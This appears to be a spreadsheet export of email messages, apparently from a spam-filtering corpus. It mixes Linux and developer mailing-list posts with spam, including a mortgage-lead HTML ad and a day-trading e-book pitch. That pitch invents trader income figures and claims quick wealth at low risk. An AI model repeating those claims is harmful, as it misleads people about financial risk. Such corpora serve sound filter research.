 paste the text (with formatting) into Word 95, which was the only
 version of Word that i had.  anyways, a little nostalgia.
 &gt; &gt; I don't have a Windows machine, so it becomes problematic to convert them;
 &gt; &gt; I know that if this were not the case, in Word I could save them as some
 &gt; &gt; other more friendly format.
 i have a windows (dual-boot) machine, but it only get used by my
 significant other and for burning multi-session cd-r/rw.  (is there any
 linux gui app that supports cdrecord's multi-session feature?)  since
 OpenOffice, i've been able to edit Word docs flawlessly (or at least the
 simple Word documents i receive from others).
 anyways...
 -- 
 PLEASE REQUEST PERMISSION TO REDISTRIBUTE
    AUTHOR'S COMMENTS OR EMAIL ADDRESS.
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Sitescooper-talk mailing list
 Sitescooper-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Headline - Navel gazing wins an Ig Nobel
</t>
  </si>
  <si>
    <t xml:space="preserve">"British scientists were honoured for research that found ostriches became
 more amorous with each other when a human was around. In fact, ostriches
 eventually started putting the moves on humans."
 this is true of manatees also.  you don't want to know.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Carey
 Sent: Friday, October 04, 2002 2:03 PM
 To: fork@spamassassin.taint.org
 Subject: Headline - Navel gazing wins an Ig Nobel
 Greetings,
 Carey wants you to know about a story on www.theage.com.au
 Personal Message:
 Ah the Ig Nobels, always worth a read :)  If only they had a cat-mood
 decipherer.  ^__^
 Navel gazing wins an Ig Nobel
 By Jay Lindsay &lt;br&gt;Boston
 October 05 2002
 URL: http://www.theage.com.au/articles/2002/10/04/1033538774048.html
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body bgcolor=#FFFFFF text=#000000 &gt;
 &lt;table width=100% height=100% border=0 cellspacing=0 cellpadding=0 &gt;
   &lt;tr&gt;
     &lt;td valign=middle &gt; 
       &lt;div align=center&gt; 
         &lt;table width=550 border=0 cellspacing=0 cellpadding=0&gt;
           &lt;tr&gt; 
             &lt;td width=22 height=50 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=213 height=50 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;strong&gt;&amp;nbsp;&amp;nbsp;The 
               Best Mortage Rates&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td colspan=2 height=50 bgcolor=979797&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;font face=Verdana, Arial, Helvetica, sans-serif color=#FFFFFF&gt;&lt;b&gt;Simple, 
               Easy and FREE&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td width=22 height=50 bgcolor=D5D5D5&gt;&amp;nbsp; &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width=22 height=25 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=213 height=25 bgcolor=979797&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td colspan=2 height=25 bgcolor=A6A6A6&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=22 height=25 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width=22 height=54 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td colspan=3 rowspan=2 valign=top &gt; 
               &lt;div align=left&gt; 
                 &lt;div align=center&gt;&lt;/div&gt;
                 &lt;div align=center&gt; 
                   &lt;table border=4 bordercolor=#000000 cellpadding=10 cellspacing=0
 width=506 height=100%&gt;
                     &lt;tbody&gt; 
                     &lt;tr bgcolor=efefef&gt; 
                       &lt;td colspan=2&gt;
                         &lt;div align=center&gt;&lt;font color=#ffffff 
       face=Tahoma,Arial,Helvetica size=4&gt;&lt;b&gt;&lt;font size=3 color=#333333&gt;Have 
                           HUNDREDS of lenders compete for your loan!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
                         &lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td bgcolor=#009966 valign=top width=160&gt; &lt;br&gt;&lt;br&gt;
                         &lt;li&gt;&lt;b&gt;&lt;font color=#FFFFFF size=2 face=Arial, Helvetica,
 sans-serif&gt;Refinancing &lt;/font&gt;&lt;/b&gt; 
                         &lt;li&gt;&lt;font size=2 face=Arial, Helvetica, sans-serif&gt;&lt;b&gt;&lt;font
 color=#FFFFFF&gt;New Home Loans &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
                           &lt;li&gt;&lt;font size=2 face=Arial, Helvetica, sans-serif&gt;&lt;b&gt;&lt;font
 color=#FFFFFF&gt;Debt Consolidation &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
 &lt;li&gt;&lt;font size=2 face=Arial, Helvetica, sans-serif&gt;&lt;b&gt;&lt;font
 color=#FFFFFF&gt;Second Mortgage &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
                         &lt;li&gt;&lt;font size=2 face=Arial, Helvetica, sans-serif&gt;&lt;b&gt;&lt;font
 color=#FFFFFF&gt;Home Equity &lt;br&gt;
                           &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=#FFFFFF&gt;&lt;br&gt;
                           &lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                           &lt;center&gt;
                               &lt;a
 href=http://61.129.68.54/master/index.php&gt;&lt;font 
       color=#ffffff face=tahoma,arial,helvetica size=4&gt;&lt;b&gt;Click Here To&lt;br&gt;
                             JUMP-START&lt;br&gt;
                             your Plans for&lt;br&gt;
                             the Future!!!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt; 
                           &lt;/center&gt;
                         &lt;/li&gt;
                       &lt;/td&gt;
                       &lt;td&gt;&lt;b&gt;&lt;font face=Verdana, Arial, Helvetica, sans-serif size=2&gt;Dear 
                         Homeowner,&lt;/font&gt;&lt;/b&gt; 
                         &lt;p align=left&gt;&lt;font color=#000000 face=Verdana, Arial, Helvetica, sans-serif new=new roman,=roman, times=times size=2&gt;Interest 
                           Rates are at their lowest point in 40 years! We help 
                           you find the best rate for your situation by matching 
                           your needs with hundreds of lenders!&lt;br&gt;
                           &lt;br&gt;
                             &lt;a 
       href=http://61.129.68.54/master/index.php&gt;&lt;b&gt;Home Improvement, Refinance, 
                             Second Mortgage, Home Equity Loans, and More!&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;font face=Verdana, Arial, Helvetica, sans-serif size=2&gt;&lt;br&gt;
                           &lt;br&gt;
                           You're eligible even with less than perfect credit!&lt;br&gt;
                           &lt;br&gt;
                           This service is &lt;font color=#000000&gt;&lt;b&gt;100% FREE&lt;/b&gt;&lt;/font&gt; 
                           to home owners and new home buyers without any obligation. 
                           &lt;br&gt;
                           &lt;br&gt;
                           Just fill out a quick, simple form and jump-start your 
                           future plans today!&lt;/font&gt;&lt;br&gt;
                           &lt;br&gt;
                             &lt;a 
       href=http://61.129.68.54/master/index.php&gt;&lt;font 
       color=#00b000 face=verdana,arial,helvetica size=5&gt;&lt;b&gt;&lt;font
 color=#009933&gt;Click Here To Begin&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt; &lt;font 
 size=1&gt; &lt;/font&gt;&lt;/p&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;/tbody&gt; 
                   &lt;/table&gt;
                 &lt;/div&gt;
               &lt;/div&gt;
               &lt;/td&gt;
             &lt;td width=22 height=54 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width=22 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=22 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td height=20 bgcolor=D5D5D5 width=22&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td height=20 colspan=3 bgcolor=#dedede&gt;
               &lt;div align=left&gt;
                 &lt;div align=center&gt;&lt;/div&gt;
               &lt;/div&gt;
               &lt;div align=center&gt; 
                 &lt;table border=0 cellpadding=4 cellspacing=0 width=500&gt;
                   &lt;tbody&gt; 
                   &lt;tr&gt; 
                       &lt;td&gt;&lt;font color=#000000 
       face=Verdana size=1&gt;You are receiving this email because you registered 
                         at one of JUNCAN.net's partner sites, and agreed to receive 
                         gifts and special offers that may be of interest to you. 
                         If you do not want to receive special offers in the future, 
                         please &lt;a href=http://61.129.68.54/empires/remove/remove.html&gt;click 
                         here&lt;/a&gt;.&lt;br&gt;
                       You are subscribed as: webmaster@efi.ie &lt;/font&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;/tbody&gt; 
                 &lt;/table&gt;
               &lt;/div&gt;
             &lt;/td&gt;
             &lt;td height=20 bgcolor=D5D5D5 width=22&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width=22 height=26 bgcolor=CCCCCC&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td height=26 bgcolor=CCCCCC width=213&gt;&lt;font face=Verdana, Arial size=1&gt;&amp;nbsp; 
               &lt;/font&gt;&lt;/td&gt;
             &lt;td height=26 bgcolor=797975 width=268&gt; 
               &lt;div align=right&gt;&lt;font face=Verdana, arial=Arial size=1 color=#FFFFFF&gt;Equal 
                 Housing Opportunity&lt;/font&gt;&lt;font face=Verdana, Arial size=1&gt;.&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td height=26 bgcolor=797975 width=25&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=22 height=26 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: What Warren Buffett won't tell ya ...
</t>
  </si>
  <si>
    <t xml:space="preserve">It was the Spring of 1979.  
 I was just a tall, goofy looking kid in middle school
 with buck-teeth and freckles.  Each day in the
 cafeteria, I walked from table to table ...
 Stealing other kids' lunch money.
 No, I didn't rob them with a gun or a knife - I just made
 them a little deal.  "Let me borrow two dollars today," I said,
 "and I'll bring you five dollars next week."  The investment
 was too good to pass up, and other kids were throwing their
 lunch money at me like gravy on mashed potatoes.  Of course 
 when "next week" rolled around and I couldn't pony up the cash,
 I promised to pay them even more the week after that,
 if they would just let me keep their investment a little bit 
 longer.
 Eventually the end of the year came and went, high school
 started and with it came girls, and homework, and parties,
 and sports, and those poor kids from eighth grade had more 
 things on their mind than last year's lunch money.
 I made off with a tidy sum for a middle school kid,
 and I didn't even get beat up.
 Hidden inside this story are the two greatest stock market 
 secrets you will ever learn.
 First of all, greed is your number one enemy. You're not
 going to turn $2 into $5 in a week, so cash out when
 you're ahead.  Don't wait for the boat to sink before 
 grabbing the lifejacket.
 Second, never trust an investment adviser of any kind.
 They are looking out for their own money, not yours.
 The "professionals", those stuffy investment counselors and
 money managers, will always tell you that the best time to
 buy is NOW.  According to those guys, the longer you keep
 your money in the market, the more money you're going to make.
 Ask them when is the best time to sell and their answer is
 "NEVER".  
 In a sense, they are right.  If you put $250,000 in an index
 fund right now, you'll probably have over a million dollars
 in thirty or forty years.  But here's the problem:
 Do you want to WAIT thirty or forty years to be rich?
 Hell no!
 You want the money NOW - so you can enjoy it. It's hard to
 make use of your fortune when you're seventy years old 
 in a wheelchair.  If you could make a million dollars in
 the next few years, what would you do with it?  Where would
 you travel?  What kind of car would you buy?  
 The fact is ... youth is the best time to be rich.
 If your goal is to make quick profits in the market, volatility
 is your ally, and stability your enemy.  You want to see
 those large upswings, two hundred points in a day, followed
 by the four hundred point crash a week later.  You don't
 care if the market went up or down 20% this year as long
 it was UNSTABLE.  That's how you're going to make the 
 money.
 What I'm talking about here is day trading.  
 My father invests the traditional way; he holds some good stocks 
 and he goes up 30K and down 30K. In the long term of 5-10 years 
 he makes money. 
 The day trader buys or sells 5,000 shares of XYZ for a
 $25,000 profit in a 5-10 minute trade.  He acts quickly, taking 
 advantage of all the information at his disposal about a 
 certain stock, and estimating whether it will go up or 
 down within hours, sometimes within minutes.  
 I can teach you how to do this - and how to make amazing 
 amounts of money at it.  It's not rocket science, and you 
 only need to learn a few basic principles to get started.
 Society would have you believe that successful trading is 
 complicated and requires formal training.  
 The truth is, wealthy people use very simple investment 
 strategies to make money.  
 Popular media and investment professionals portray successful
 trading as difficult and complex to scare you out of the boxing
 ring.  They don't want the competetion - and they sure as hell
 don't want you paying a few dollars to an online trading firm
 to execute a trade for which they'd charge you forty or fifty 
 dollars.
 They make their money only if you believe two lies:
 1) That investing is too difficult and risky for the average 
 person.
 2) That using an investment adviser who charges a high 
 commission is safer than trading online for a few bucks 
 per trade.
 Here is what the financial gurus in today's society absolutely,
 positively DO NOT WANT YOU TO KNOW ...
 The strategies for profitable day trading are in fact
 so simple that anyone can do it - provided they spend
 a few hours of studying.  
 After reading over 200 financial books and publications
 during the past decade, and after using day trading
 to successfully make more than four million dollars in
 the stock market, I've learned the following lessons:
 ** Achieving financial success is incredibly simple.
 ** Anyone can do it.
 ** It only takes a few hours to learn.
 When I discovered the secret to day trading, I didn't become
 wealthy overnight.  If you want instant cash, drive to Wal-mart. 
 Buy a ski mask and a shotgun, and rob your local bank. The 
 only way to get rich, quick or otherwise, is through
 hard work, knowledge, and determination.
 After learning the fundamentals of day trading, I started 
 practicing the trading art itself, and the first few weeks
 brought modest gains.  The next few months gave me the practical
 experience I needed to really earn a living, and I was pulling
 close to a six figure income. In less than three years with no 
 formal financial training, minimal effort and only moderate risk,
 I had made my first million.  The knowledge that I gained 
 during those formative trading years I am willing to share
 with you in my new book, the Master Trader.  You will learn from
 my mistakes, and from my successes, as I teach you the simple,
 secret formula for day trading that I've used profitably
 year after year.
 The income of the day trader can be staggering.  Thousands, even 
 hundreds of thousands of dollars can be made or lost within
 minutes.  The difference between making money and losing your 
 shirt is simply this: knowledge.  I will provide that knowledge,
 and I will give you a winning edge at this high-stakes game. 
 Average Income of a Day Trader: 
 5% average an income in excess of $500,000 per year
 22% average an income in excess of $250,000 per year
 35% average an income in excess of $100,000 per year. 
 27% average an income between $50,000 and $99,999 per year 
 11% average an income between $20,000 and $49,999 per year 
 After reading the Master Trader, you will discover extremely 
 profitable, simple yet powerful trading methods that give 
 you an almost unfair trading advantage and make you 
 win DESPITE the current market weakness. 
 Here is just a snippet of what I will teach you:
 *** Make money whether a stock goes up or down.
 *** Learn how to get in and out of stocks within split seconds.
 *** Learn exactly what stocks to trade, the exact price to 
 buy them and the exact price to sell them. 
 *** Save thousands of dollars by learning to avoid the 
 mistakes beginners make.
 *** Learn how to trade stocks like a pro and how to make money 
 consistently in every market! 
 *** Learn proven strategies that give you the highest chance 
 for great success. 
 *** Profit on huge intraday price swings.
 *** Make money on the biggest news stories.
 *** Actively manage your risks and learn how to realize maximum
 returns. 
 *** Learn how to use the tools and information Wall Street 
 professionals use.
 *** Learn how to develop and maintain a winning state of mind. 
 It's time to ask yourself: "Am I going to listen to the 
 Professionals who say BUY BUY BUY but never sell?  Or am
 I going to take control of my own financial future, and
 start making money RIGHT NOW in the stock market?"
 Who is looking out for your best economic interests - some
 wealthy Wall Street stockbroker, or yourself?
 With the Master Trader e-book, you will learn everything you 
 need to know in order to get started with Day Trading ... from 
 choosing the best broker in order to take advantage of the 
 lowest commissions and instant order executions to professional 
 trading strategies that make professional traders millions of 
 dollars.
 The Master Trader e-book is the most comprehensive yet easy to 
 understand and straight-forward book ever written about active 
 trading. If you are serious about success in short term stock 
 trading - ORDER TODAY and start paving the road to your
 own financial future.
 Oh, and remember that scraggly kid in the eighth grade?
 His high school friends laughed when he said he was going to 
 make money in the stock market.  
 Six years later, he bought a beach-front home on the California
 coast - WITH CASH.  Oops, they weren't laughing anymore.
 In a rollercoaster market like we have today, day trading
 is the fastest track to wealth.  If you're looking
 for a long-term retirement investment with no risk 
 that goes up 5% a year, then by all means, this ain't
 your kind of game.
 But if you want the QUICKEST possible way to make a FORTUNE
 in the market, with the lowest element of risk, then
 order the MASTER TRADER e-book right now.  I promise
 to teach you ALL of the secrets that helped me become a
 millionaire through successful day trading.
 You don't need to know anything about the market, and
 anyone can do it, with minimum effort.  It's an easy
 game to win if you know how the pieces move.
 Order the MASTER TRADER e-book right now for only $49.97
 by clicking on the link below:
 http://4tools4life.com/qs
 ******************************************************
 Our company is strictly opposed to unsolicited emails.
 To be removed from this list, please send an email
 to "bulkexpert@yahoo.com"
 ******************************************************
 0283PTfl6-774Bfbm7392dPuV0-307VjSM4803zjlu1-614iiKT2570JdKt6-854fhdA5838oELl71
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Sysadmin / IT person wanted
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri 02 Aug 2002 13:41, Colm Buckley wrote:
 &gt; The job is for a Windows (NT and 2000) and Linux (Debinan) [...]
 Pah.
 "Debian".
          Colm
 -- 
 Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
 You're slower than a herd of turtles stampeding through peanut butter.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday 06 September 2002 06:16 am, Eugen Leitl wrote:
 &gt; I don't know what exactly is wrong, but something is definitely wrong.  
 &gt; This is way too important to be left to just our intuition of what is
 &gt; right and what is wrong.
 This is one of those formally difficult points from a philosophy 
 perspective.   You can't really throw out intuition and emotion because 
 reason really only gets you answers that reflect the genome and the 
 ancestral environment.   Going forward requires creativity and experiment.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] linux based IVR
</t>
  </si>
  <si>
    <t xml:space="preserve">Just wondering if anyone has implemented one before, and any suggestions 
 etc.
 Yes i am googling, but would like some experienced opinion if available ;)
 Gavin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RH 8 no DMA for DVD drive
</t>
  </si>
  <si>
    <t xml:space="preserve">hdparm -d1 /dev/hdc says Operation not Permitted.
 DVD playback is very jumpy.
 Does someone have any ideas on what I can do yo get DMA transfers?
 Thanks Alvie
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Is it possible to use new apt to do (null) to RH8 upgrade?
 It might be, don't think anyone tried it yet.
 &gt; Even if it's possible, are there good reasons why maybe I should not do it and
 &gt; just use the RH iso's (I don't think RH8 will upgrade from (null), maybe up2date
 &gt; will)?
 Yes ;)
 first off, redhat does not support upgrading from beta's to the released 
 version.  That doesn't mean it can't work, it means nobody tried it, they 
 sure didn't test it or fix anything to make it work, and you're on your 
 own.
 second, historically a new .0 numbers mostly means "so much has been 
 changed that you might have problems upgrading from any previous release 
 anyway".  So, historically, most users installing a .0 release do this 
 from scratch anyway, doing upgrades throughout x.0-&gt;x.y.
 If you want to avoid problems, bite the bullet and reinstall ;)
 Thomas
  -- 
 The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
 &lt;-*-                      -*-&gt;
 And every time she sneezes
 I think it's love and oh lord
 I'm not ready for this sort of thing
 &lt;-*- thomas@apestaart.org -*-&gt;
 URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] web amusements...
</t>
  </si>
  <si>
    <t xml:space="preserve">ok, so i was also learning about css this weekend (thanks to the fine
 folks in irc.linux.ie, #linux!).  i came up with the following in
 my travels.  first, two style sheets:
 http://ie.suberic.net/css/style.css:
     body {
 	color : black;
 	background-color : white;
     }
 http://ie.suberic.net/css/style-windows.css:
     body {
 	background-image : url("http://ie.suberic.net/images/use.linux.gif");
 	background-repeat: repeat;
     }
 then i include the css in an html page like so:
     &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"&gt;
     &lt;html&gt;
     &lt;head&gt;
     &lt;link rel="stylesheet" href="/css/style.css"&gt;
     &lt;title&gt;blah&lt;/title&gt;
     &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-15"&gt;
     &lt;/head&gt;
 now i use mod_rewrite to rewrite requests for /css/style.css to
 /css/style-windows.css if the browser is on windows by putting this
 in httpd.conf:
     RewriteEngine   on
     #RewriteLog     "/tmp/foo.log"  # use this for debugging
     #RewriteLogLevel        3
     RewriteCond     %{HTTP_USER_AGENT}      Windows
     RewriteRule     ^/css/style\.css$       /css/style-windows.css
 oh, and of course images/use.linux.gif is an animated gif that is
 transparent for 55 seconds and then displays "use linux!" in a large
 blue font for 5 seconds.  :)
 and the way to create animated gifs is to put each frame in a layer in
 the gimp.  pick any name for each layer, but make sure each layer ends
 with (XXXms) where XXX is the number of milliseconds the frame displays.
 then use the animation tool to export the animation.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</si>
  <si>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--==_Exmh_1521948024P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Mon, 26 Aug 2002 20:00:36 +0200
 &gt;
 &gt; 
 &gt; lately I've got the feeling that exmh is getting slower and slower. I 
 &gt; just decided to check that vs. reality, and yes, speed has left the 
 &gt; scene somewhere between the release of 2.5 and now.
 &gt; 
 &gt; I checked on a number of small messages in a big folder (~10000 
 &gt; msgs). The delay of the Next button has increased considerably:
 &gt; 
 &gt; 2.5-release: 350-450 msec
 &gt; latest cvs: 1000-12000 msec
 &gt; 
 &gt; Frankly I think this is getting close to non-acceptable since the 
 &gt; user settings hasn't changed.
 &gt; 
 &gt; Anybody have any ideas where performance disappeared?
 Most likely in the added overhead of managing more sequences.
 I'm sure it can be tuned a bunch, but as I'm leaving for a vacation on Friday, 
 and have plenty of "real work" to do, I won't be able to do much until I get 
 back.
 I *will* look at all this when I get back, but if you want to check into 
 what's slow and fix things while I'm gone, my feelings won't be hurt.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1521948024P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9anDAK9b4h5R0IUIRAi7qAJsEAXgadxpxYR5yEcwl9VcuhonraACcDI87
 yyhj/sCflWdxrSbT4ZsT9yU=
 =AcMk
 -----END PGP SIGNATURE-----
 --==_Exmh_1521948024P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] phew!
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:
 &gt; Yes -- 50% of the entire set for training and 50% for evaluation.
 Once you've settled on the final method for any one release, why not
 use 100% of the data for a final run?
 Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [s-t] Scoot boss's wife orders hit.
</t>
  </si>
  <si>
    <t xml:space="preserve">---------- Forwarded message ----------
 Date: Mon, 23 Sep 2002 09:52:44 -0700
 From: mis@seiden.com
 Subject: Re: [s-t] Scoot boss's wife orders hit.
 the "independent", a shopper's newspaper in the sf bay area, (the
 operational definition of that media category is "no matter how hard
 you try you can't get them to stop delivering it") had this story on
 aug 24, 2002:
 "Dot-com downturn linked to domestic violence"
 Domestic-violence worker Kathy Black remembers watching the Nasdaq 
 take a nastydive on MSNBC, in March 2000.
 "I knew then that we would have a lot of work on our hands," Black said,
 referring to the caseload at La Casa de las Madres, the city's largest
 organization serving women and children affected by domestic violence.
 She was right.
 Calls to La Casa's crisis line increased by 33% in the last financial
 year, and the service saw a 10 percent increase in the demand for
 beds, with 232 women and 215 children utilizing the shelter service.
 ...
 Black said the dot-com collapse and a growing awareness of La Casa's
 services were the two main reasons for the increase in calls.
 She said many of her clients had partners who were employed in
 service-industry jobs utilized by dot-com workers   
 ...
 On Mon, Sep 23, 2002 at 04:23:17PM +0100, Gordon Joly wrote:
 &gt; 
 &gt; 
 &gt; 
 &gt; http://news.bbc.co.uk/1/low/england/2276467.stm
 &gt; 
 &gt; 
 &gt; Woman admits trying to hire hitman
 &gt; 
 &gt; The former wife of an internet tycoon has admitted trying to hire a 
 &gt; hitman to kill him after the breakdown of their 21-year marriage.
 &gt; 
 &gt; 
 &gt; -- 
 &gt; Linux User No. 256022///
 &gt; http://pobox.com/~gordo/
 &gt; gordon.joly@pobox.com///
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Buyer's Alert | July 16, 2002&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt; 
 &lt;CENTER&gt;&lt;A name=top&gt;&lt;/A&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#232850 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=bottom&gt;
     &lt;TD width=440 colSpan=4&gt;&lt;IMG height=60 alt="ZDNet Buyers Alert Newsletter" 
       src="http://www.cnet.com/i/sh/nl/hd_buyers_alert.gif" width=440&gt;&lt;/TD&gt;
     &lt;TD vAlign=top align=middle width=160 bgColor=#ffffff rowSpan=2&gt;&lt;!-- ad --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWurdeBn7NWtUoF24wxeeR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Toshiba.sky.price.perform.pleasure.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /ad --&gt;&lt;!-- rebates --&gt;
 &lt;br&gt;&lt;img src="http://www.cnet.com/i/nl/zd-ba/rebates.gif" width=160 height=18 alt="Rebates"&gt;&lt;br&gt;
 &lt;table width=160 bgcolor="#eeeeee" cellpadding=5 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2"&gt;When ordering, make sure the reseller/manufacturer 
 provides the rebate coupon you need.
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 5, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTbVm_vzGZP85eXsJh-PR" &gt;$50 off Cidco Mailstation with subscription&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqr3GOW-0pvVdi5Z7ednR" &gt;Get a car cassette adapter and power adapter FREE with Rio Volt SP250&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires August 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvUtmhmbiqzUbrvLkiDeR" &gt;$20 off SideWinder Strategic Commander&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires September 30, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T839glEn9kgGa2oXqGyR" &gt;$20 off Rio 600 64MB&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsVa7K7VPyLxjkqVAXXblR" &gt;$20 off Nike PSA (120)&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=46-19zwInpD4HbC89Xa1cN0535V0Y9R" &gt;$20 off RioVolt SP90&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;font face="arial, helvetica" size="-2"&gt;Expires March 3, 2003&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDBhl1Y1bxCjjvDSwizzcR" &gt;$10 off Microsoft Natural Keyboard Pro PS2/USB&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
